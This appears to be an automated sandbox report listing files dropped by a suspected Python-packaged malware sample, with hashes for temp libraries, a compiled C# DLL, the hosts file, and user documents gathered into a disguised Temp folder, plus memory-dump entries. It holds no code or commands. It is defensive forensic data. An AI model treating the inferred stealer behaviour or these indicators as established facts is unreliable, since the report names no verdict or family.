8a48f64243b3bd1d9e4a22c31e6af4f6abfceed7d0ffad92d903382b2182e7a7b35e9bc8e807d2d6df0b712057c1ea3401a0e348cb9c36f7f9ef17e1c497a654

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5602\sqlite3.dll

Filesize
605KB

MD5
66419fef57a0fd3120eb5e3257af2a71

SHA1
07227047083145297e654af227390c04fb7b4b62

SHA256
187712738c37bc1679c9643a1bf4ef0713ce4cfc4588e031f0e05462dc604f7a

SHA512
dfb2d661057e0bf3ff836b0bd8c687eb348f50f687fa5a3223fc3fedab54eaf45d804d2c29957f8b6c486ed5dec11a32c58cb5524eae511e1b83d7b04ff7b925

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5602\unicodedata.pyd

Filesize
288KB

MD5
7506fa8830457626126300e7c6c7f464

SHA1
6e49bad3776ae6167ae6ed9374f23442d4e3f542

SHA256
1f0fee5cfaebaa0c6370cb6b9e473957244565c6ee5a7185fbf8a571a531ddac

SHA512
e73954fd3660c4fc76199cfb6a5a6b16f5f4714153a7f2e8cec6cdeb27875cd311042c5ec93e67cd71b65a79b32f84dbb803772d9f7f15eb4acda9dc0da06163

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ssdghory.sxn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kc2wswdd\kc2wswdd.dll

Filesize
4KB

MD5
d7d065265f563370455c48b5364ee55e

SHA1
3629729584fefcc3a43e4b42c90cda4de801b36e

SHA256
7b5a5d5a9855cb7bc2123c6c30546975d216dda7926b09ac9804aac3da2fdfd8

SHA512
d3b8c24d5dc2f9cb6f73a77f910992a25d5521647480a5a5f752c4dadcdf19ec8868e20fa04dc71a0290b2ced8bcd62748514edc269dd5d8c8cdb7b4d6dd1d34

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\ConfirmMerge.jpg

Filesize
652KB

MD5
acd2c79004c351d5ccbdec1108facc0b

SHA1
829ad6dfdb43d5bdd3e832e4e7a34fdc496a7f3d

SHA256
6c80c213355fbf6655bcb76b193f8bcc035b87dc7974066f0d616fd9ae296a04

SHA512
3120f552bbec541e38e2c05b5ca1394927c4e55ef1b8214a14fc82bee5e104d55948e4bfbea5971dbacc728c4956c494092b6d659e6ad5ae69055c59a18ace77

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\CopyHide.doc

Filesize
535KB

MD5
193a1bdc5c7d80f5b53398c7de2d6510

SHA1
21b71b920d0d8f828281e30b65f94d099052f6f3

SHA256
a47621c285eef4fe7a556d8d054e8c0ae39c3de9e50b3054e98d2903bd7a4c18

SHA512
c82b76b77baaa675d6ad124bda51b1e442d89cfa3d2e4ce3268e477ba0f1f2b597e040ff2285c1aeadf380ebaad6f684ec27cf9ce69964dee7f61e846dd06bfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\OutCompare.docx

Filesize
14KB

MD5
a70d8a51cce3312e84b924571b3a55f8

SHA1
77ecd75180cb850b462fae33394546ea3bd2c44f

SHA256
234447d8aa8c54d8fc2a04009ec70b0f1b0d27108e116a29d23a7a3164e84f4f

SHA512
56cb0ec118d58f5eeb27388a7272fb90657ae053a926983b7a327856131e0c17cce55253108d1ec7740324814f6e255d61fc3cd246c1b41cf75e9ee39f6833c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\ProtectStop.docx

Filesize
16KB

MD5
7a4be059be5ecf76af8b941efbb73fbe

SHA1
81fce8de8872611c6f4c8d54f043ee25101627c9

SHA256
8f36b9b595d80b548518a282a986323af132581b48afef6ecf2bc0893d80dd60

SHA512
359c411dc998a2ad1a38f647da6e54e27df93277c1e2dd663806a51a38860be9a78b9c8668feb4420b9ec222cae4559f7046d58a86c6172c180de3c368029d92

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\PublishCompress.docx

Filesize
17KB

MD5
051c9ed5fe5de2ee43193ce3a7a941e4

SHA1
5d182516db2bd67005e6ca0ae707025eeb683d8d

SHA256
7226fbf6bec5e5801d1285ed17d0aa28b4dceaa4ca2d2724b24622fda7d09737

SHA512
e8ac77c552defd967f503c3c248079c49f19f2e0972b1b1249ff04b024f01f70fa181f02a217c140afe43bd99401b6c9126bc3dc26aca82b69234820e687badd

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\RegisterSend.mp4

Filesize
340KB

MD5
6034ff20e4cefb55052ca62b0863c0bf

SHA1
50d62330f018485fbd3a50b17f5c47e4f3ef9a4c

SHA256
4aba464cb2442bf839e102955672ed09d9fa5d49c00b9dbc7669ec67ed5ab3b6

SHA512
5c57de8ee2ca31ec23f472088a47d482b0f927b365a4a7e01ea73746142738fdbf8646d893c0687d88641602f78a635b808d7a0ce3763c385679bcea997ab144

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\ResizeStop.mp4

Filesize
808KB

MD5
e709664b8657d26ff4dc5b996f018d03

SHA1
1593a936b96e417f7a948d65828c9bd94e4be03c

SHA256
aceca41375c3b1b5bc2034310fd614e9b55e297e925339126075ce57323dae48

SHA512
6d2bcdbdab91d1805f7816592c7b8eb8e315c826cde184daf2341591d9b07b322e2eb04ae3612e70e9be8274bdddbfe341d4cc1701184212740f3f32275832cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\SelectProtect.docx

Filesize
788KB

MD5
0feddd705aa9b983fe80dcb285e11128

SHA1
1509e79d6f733d546a9dc82b330f52b76a1b1a9c

SHA256
ba758f04a311516c99231bee0ee85e00080500fcdf3d84e98515cc7d53ff94f4

SHA512
d0a22c45377b882e0e16786cc9845584a5fda6f14217c432a5ae31870ad702c1900dc5a52bf6f729dc4b58a4ab8a02d7072f483fcbe085bd27fd05046e8bf212

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\UnprotectBlock.xlsx

Filesize
11KB

MD5
abe199ac3021a4e0fd9cdee805470e30

SHA1
c478f3618db2cdbaf80606a8edbbfb81d397669a

SHA256
257922cb00983cdd8fe1666ecf30774280437e40daddcbe2412728ebe9cee32a

SHA512
0b2edf1311e470dcc07cb3614256690b650a07b4bd92a272e541a480320fe8d4da14af920e191bec35fccefefc46443c9f56498c32b70cf796d49e5d5b8625e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\WaitAdd.docx

Filesize
21KB

MD5
89686c3f43708315880b90ed6983f7b5

SHA1
9b4269223bbfabd6d37a436bfa204abd8e2606e4

SHA256
5e47a2bfaf0c52cda997ac73767abd4506869b2daec6a214df7369eb89bcad62

SHA512
753546080428084e684dd6d96b0ae2c7c1142a68b2cc5fb1c62183d3466022fd3b1da71bcc70601eb2a48a81c17a5ad43959024a20ac72f68b11abfd007e24af

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\CloseEdit.docx

Filesize
14KB

MD5
244ce356dfd09a9b752fdf0b0672aa10

SHA1
b86267d69a122cc27dfbad37b1d2176d5413f7dd

SHA256
0eec96e90354df93a8fe90ee2046f633680fbd8a8faff77026c9cea68c11fe9b

SHA512
79b4b637d2aa9ede2ed5d5727901d98ae6f7478b6b78380589ca04d82a1f5def60ea2b7df56327628e1868d2d38e55875ad066d7b8026f50919cd040c6aabd05

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\MeasureSplit.docx

Filesize
19KB

MD5
03bb521bf6f706d32481c77aea450a9b

SHA1
9e7d05a7bf3c773f4e0cba046d703ca76c154bb7

SHA256
cf20ffb78caa92699d6944220ce2bc6b6ce5ed66da327109295185954f3dc115

SHA512
57b2d6c9f56a69cdd305026e1d4d25945f3248ba3b495ea69a62bd787f01abc7eff0b989ed569f17c2d320ef16a32383f867ea89ee0cdc5c29072708d18df5b8

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kc2wswdd\CSCA63A268043DA4AB5A730C440F9BB3188.TMP

Filesize
652B

MD5
754b3035b9975710c16716858934c2ac

SHA1
0d4a8c88c4a711c43cb42b418947dc245bfeba84

SHA256
75e19d1b2c7e15ad8925d22613e575dc392e4812d0ce197b3e2dec229b1e6c23

SHA512
ea5f2fc60c8c7cb31c44ed689e96f9cc3d5487b79b0ed281f593defb75c2c173a456bba10f8aabe16743d5a24eefa0f238326dbd24575f9dd08af2b64194a269

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kc2wswdd\kc2wswdd.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kc2wswdd\kc2wswdd.cmdline

Filesize
607B

MD5
e2494d6d7a97a509d639116963992b45

SHA1
81638a4b3f5afae988d10a1bcdc0e9d875a71390

SHA256
f9eba0a29529b5a071870b7e25e78d12e68bb68369099e2228f11a39cb2e94e9

SHA512
f7c738640a624166ed301cec0ad69aaebe60a29582a2dcf27e20b6478e5097ee30d58a5ba2f2b8fb70ef5ea635f20a30c44c84b4841c595304da8c64c70bc3d4

Download Submit
memory/540-212-0x0000018A5F520000-0x0000018A5F528000-memory.dmp

Filesize
32KB

Download
memory/2712-57-0x00007FF969A70000-0x00007FF969A89000-memory.dmp

Filesize
100KB

Download
memory/2712-48-0x00007FF971AD0000-0x00007FF971ADF000-memory.dmp

Filesize
60KB

Download
memory/2712-109-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp

Filesize
1.4MB

Download
memory/2712-72-0x00007FF95A4D0000-0x00007FF95A847000-memory.dmp

Filesize
3.5MB

Download
memory/2712-76-0x00007FF9699E0000-0x00007FF9699F4000-memory.dmp

Filesize
80KB

Download
memory/2712-80-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp

Filesize
124KB

Download
memory/2712-71-0x00007FF95B780000-0x00007FF95B837000-memory.dmp

Filesize
732KB

Download
memory/2712-81-0x00007FF95A3B0000-0x00007FF95A4C8000-memory.dmp

Filesize
1.1MB

Download
memory/2712-78-0x00007FF96D9C0000-0x00007FF96D9CD000-memory.dmp

Filesize
52KB

Download
memory/2712-73-0x000001F195560000-0x000001F1958D7000-memory.dmp

Filesize
3.5MB

Download
memory/2712-275-0x00007FF969A00000-0x00007FF969A2E000-memory.dmp

Filesize
184KB

Download
memory/2712-277-0x00007FF95B780000-0x00007FF95B837000-memory.dmp

Filesize
732KB

Download
memory/2712-278-0x00007FF95A4D0000-0x00007FF95A847000-memory.dmp

Filesize
3.5MB

Download
memory/2712-74-0x00007FF96E110000-0x00007FF96E134000-memory.dmp

Filesize
144KB

Download
memory/2712-66-0x00007FF969A00000-0x00007FF969A2E000-memory.dmp

Filesize
184KB

Download
memory/2712-283-0x000001F195560000-0x000001F1958D7000-memory.dmp

Filesize
3.5MB

Download
memory/2712-64-0x00007FF96DED0000-0x00007FF96DEDD000-memory.dmp

Filesize
52KB

Download
memory/2712-62-0x00007FF969A30000-0x00007FF969A49000-memory.dmp

Filesize
100KB

Download
memory/2712-60-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp

Filesize
1.4MB

Download
memory/2712-58-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp

Filesize
124KB

Download
memory/2712-357-0x00007FF9699E0000-0x00007FF9699F4000-memory.dmp

Filesize
80KB

Download
memory/2712-54-0x00007FF969A90000-0x00007FF969ABD000-memory.dmp

Filesize
180KB

Download
memory/2712-70-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp

Filesize
4.4MB

Download
memory/2712-181-0x00007FF969A30000-0x00007FF969A49000-memory.dmp

Filesize
100KB

Download
memory/2712-30-0x00007FF96E110000-0x00007FF96E134000-memory.dmp

Filesize
144KB

Download
memory/2712-25-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp

Filesize
4.4MB

Download
memory/2712-295-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp

Filesize
4.4MB

Download
memory/2712-301-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp

Filesize
1.4MB

Download
memory/2712-300-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp

Filesize
124KB

Download
memory/2712-296-0x00007FF96E110000-0x00007FF96E134000-memory.dmp

Filesize
144KB

Download
memory/2712-330-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp

Filesize
4.4MB

Download
memory/2712-345-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp

Filesize
4.4MB

Download
memory/2712-370-0x00007FF95A4D0000-0x00007FF95A847000-memory.dmp

Filesize
3.5MB

Download
memory/2712-369-0x00007FF95B780000-0x00007FF95B837000-memory.dmp

Filesize
732KB

Download
memory/2712-368-0x00007FF969A00000-0x00007FF969A2E000-memory.dmp

Filesize
184KB

Download
memory/2712-367-0x00007FF96DED0000-0x00007FF96DEDD000-memory.dmp

Filesize
52KB

Download
memory/2712-366-0x00007FF969A30000-0x00007FF969A49000-memory.dmp

Filesize
100KB

Download
memory/2712-365-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp

Filesize
1.4MB

Download
memory/2712-364-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp

Filesize
124KB

Download
memory/2712-363-0x00007FF969A70000-0x00007FF969A89000-memory.dmp

Filesize
100KB

Download
memory/2712-362-0x00007FF969A90000-0x00007FF969ABD000-memory.dmp

Filesize
180KB

Download
memory/2712-361-0x00007FF971AD0000-0x00007FF971ADF000-memory.dmp

Filesize
60KB

Download
memory/2712-360-0x00007FF96E110000-0x00007FF96E134000-memory.dmp

Filesize
144KB

Download
memory/2712-359-0x00007FF95A3B0000-0x00007FF95A4C8000-memory.dmp

Filesize
1.1MB

Download
memory/2712-358-0x00007FF96D9C0000-0x00007FF96D9CD000-memory.dmp

Filesize
52KB

Download
memory/2812-83-0x00000234B5E30000-0x00000234B5E52000-memory.dmp

Filesize
136KB

Download